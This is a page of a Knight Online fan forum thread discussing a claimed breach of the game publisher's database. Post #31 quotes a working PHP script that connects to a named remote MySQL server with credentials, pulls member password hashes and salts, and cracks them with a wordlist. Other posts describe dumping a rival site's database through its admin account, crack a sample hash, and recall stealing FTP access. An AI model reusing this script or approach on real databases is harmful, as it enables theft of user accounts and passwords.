Page 3 of 6 FirstFirst 123456 LastLast
Results 31 to 45 of 85

usko database rehacked

This is a discussion on usko database rehacked within the General Chat forums, part of the Knight Online (ko4life.com) category; Originally posted by Vlein Code: <?php $lib = 'big.txt'; //plug an option custom wordlist here $link = mysql_connect("aonic.net", "fuck", "gaming"); ...
Page: 3


  1. #31
    Yun_Yuuzhan
    Guest

    Default

    Originally posted by Vlein
    Code:
    <?php
    
    $lib = 'big.txt'; //plug an option custom wordlist here
    
    $link = mysql_connect("aonic.net", "fuck", "gaming");
    
    mysql_select_db("gaming");
    
    
    
    if(is_numeric($argv[1])){
    
    	$query = "SELECT converge_id AS id, converge_pass_hash as hash, converge_pass_salt as salt, m.name as name 
    
     * * FROM ibf_members_converge, ibf_members AS m 
    
     * * WHERE converge_id = '{$argv[1]}'
    
     * * AND m.id = converge_id";
    
    }else{
    
    	$query = "SELECT converge_id as id, converge_pass_hash as hash, converge_pass_salt as salt, m.name as name 
    
     * * FROM ibf_members_converge, ibf_members AS m 
    
     * * WHERE name = '{$argv[1]}' 
    
     * * AND converge_id = id";
    
    }
    
    $result = mysql_query($query) or die("Query failed : " . mysql_error());
    
    $r = mysql_fetch_assoc($result);
    
    
    
    echo "Running $lib on $r['hash']...";
    
    
    
    if(isset($r['salt'])){
    
    	foreach(file($lib) as $x){
    
     *$y = md5( md5($r['salt']).md5(trim($x)) );
    
     *
    
     *if ( $y == $r['hash'] ){
    
     *	die("nrResult:nr$y === $xnr");
    
     *}/*else{
    
     *	echo "nr".trim($x)." !== $hash";
    
     *}*/
    
    	}
    
    }
    
    
    
    ?>

    Code:
    e540211aa60e3e20014038a3de8a94f8
    ^thats all a "md5 hash" is
    That's as useful as knowing that a car is made of metal.

    I'd like to see it reverse engineered so you produce a plaintext password when given the MD5 hash.

  2. #32
    h4x0r Admin Devile's Avatar
    Join Date
    Mar 2006
    Posts
    2,545

    Default

    Originally posted by Vlein
    u can make a php script that reads thru a big list of "word list" (password list for brute force) for the md5, we did this to fuckgaming before, we downloaded their database thru their root admin, and made a php script read thru the word list. so people with passwords that were common in the english language would pop up.
    Try cracking this hash:

    5c5be57882b89582c26ef05907f95f93

    and tell your grand grand grand sons to call my grand grand grand sons with the answer.

    Bruteforcing will only pick dictonary based passwords. A 12 characters password with uper/lower cases, numbers and letters will take AGES to crack. Even something as simple as the word Knight2000 (b1f0d349f7824276264ffc20b7050cee) will take lot of time to find. U will have more luck with online md5 hash databases. Not to mention all the different languages there are so password can be based in lots of dictionaries.

    Besides, what makes u think KO passwords are MD5 hashes? Maybe they are encrypted with a different algorithm or even in plain text I'm 99% sure they are in plain text.

    PS: K19FaVckyztZ

  3. #33
    Yun_Yuuzhan
    Guest

    Default

    Originally posted by Devile
    Besides, what makes u think KO passwords are MD5 hashes? Maybe they are encrypted with a different algorithm or even in plain text I'm 99% sure they are in plain text.
    I really hope you're wrong about that, Devile.

  4. #34
    OohYouTouchedMyTraLa
    Guest

    Default

    Not to mention all the different languages there are so password can be based in lots of dictionaries.
    or made up words

  5. #35
    PopTart
    Guest

    Default

    i think its bullshit cuz K2 related people use a @k2networks.com email not @knightonlineworld.com

  6. #36
    Senior Member festo's Avatar
    Join Date
    Mar 2006
    Location
    England
    Posts
    2,820

    Default

    5c5be57882b89582c26ef05907f95f93

    pw = burrito

  7. #37
    h4x0r Admin Devile's Avatar
    Join Date
    Mar 2006
    Posts
    2,545

    Default

    Originally posted by Yun_Yuuzhan+--><div class='quotetop'>QUOTE(Yun_Yuuzhan)</div>
    <!--QuoteBegin-Devile
    Besides, what makes u think KO passwords are MD5 hashes? Maybe they are encrypted with a different algorithm or even in plain text I'm 99% sure they are in plain text.
    I really hope you're wrong about that, Devile.[/b]
    It's either plain text or an algorithm they can encrypt and decrypt. My guess, plain text. Also, didn't few months a ago a hacker post a list of accounts/passwords supposedly from a hacked DB? That kinda supports the idea of plain text.

  8. #38
    Senior Member festo's Avatar
    Join Date
    Mar 2006
    Location
    England
    Posts
    2,820

    Default

    Well it used to be plain text but in january, a memo was sent to everyone. Which stated what desired additions we would like;

    Desired Additions
    • Expand game chat limit for game masters to 256.
    • Add more levels of gm privileges.
    • Detailed GM command list
    • Recompile Knight tools so that our version of our tool is unique only to USKO.
    • Encrypt the game database password and account ID fields.
    • New boss - We need detailed requirements to design these boss’s ourselves.

    So
    B)

  9. #39
    h4x0r Admin Devile's Avatar
    Join Date
    Mar 2006
    Posts
    2,545

    Default

    Ok, memo was sent. Question is, did they do it?

    Since that small change requires prolly big changes everywhere. I mean about the accountid/password fields. Game servers, GM tools, website, etc.

  10. #40
    Senior Member festo's Avatar
    Join Date
    Mar 2006
    Location
    England
    Posts
    2,820

    Default

    lol nothing that was in the memo that i know of got changed

  11. #41
    HeLLorY
    Guest

    Default

    i just investigate the link that u gave, and i saw nothing in that forum... just a man claiming that hacked k2network db but there is no evidence rather than msn logs. also we know that these msn logs can be easily repaired by potoshop or other types of the programs. i do not want to say that these r remaked pictures, but i can not really believe that k2network admins use msn to contact the hacker or whatelse.. the hacker says i sent them e-mail and they invited me msn... etc.. it is not really seems true :unsure: also, as i see that man in his own website, he wrote that he is from samsun/turkey where i was born in :P and i can't believe that there exist a hacker from samsun ^_^ it is unbelievable so, i am pretty relaxed when i saw him from samsun... go go go lvl 70 :rollseyes:



    HeLLorY/ares/68 lvl kassar hood...

  12. #42
    00:00
    Guest

    Default

    true or not i dun care .. but if he say true we see after 7 days :wub: gn

  13. #43
    0wnoR
    Guest

    Default

    oke :lol:

  14. #44
    userbin
    Guest

    Default

    its possible to crack md5's

    we used to do it back when i was a warez monkey, stealing other irc channels ftp's ;/


    although im with devile... k2's security is so shit its not funny... ther's probably a master pass list on a plain text file some where...

  15. #45
    Senior Member
    Join Date
    Mar 2006
    Posts
    1,554

    Default

    Originally posted by userbin
    its possible to crack md5's

    we used to do it back when i was a warez monkey, stealing other irc channels ftp's ;/


    although im with devile... k2's security is so shit its not funny... ther's probably a master pass list on a plain text file some where...



    maybe its possible , im never tryed cuz i dont need to but i believe its one of the hardest so far

Page 3 of 6 FirstFirst 123456 LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •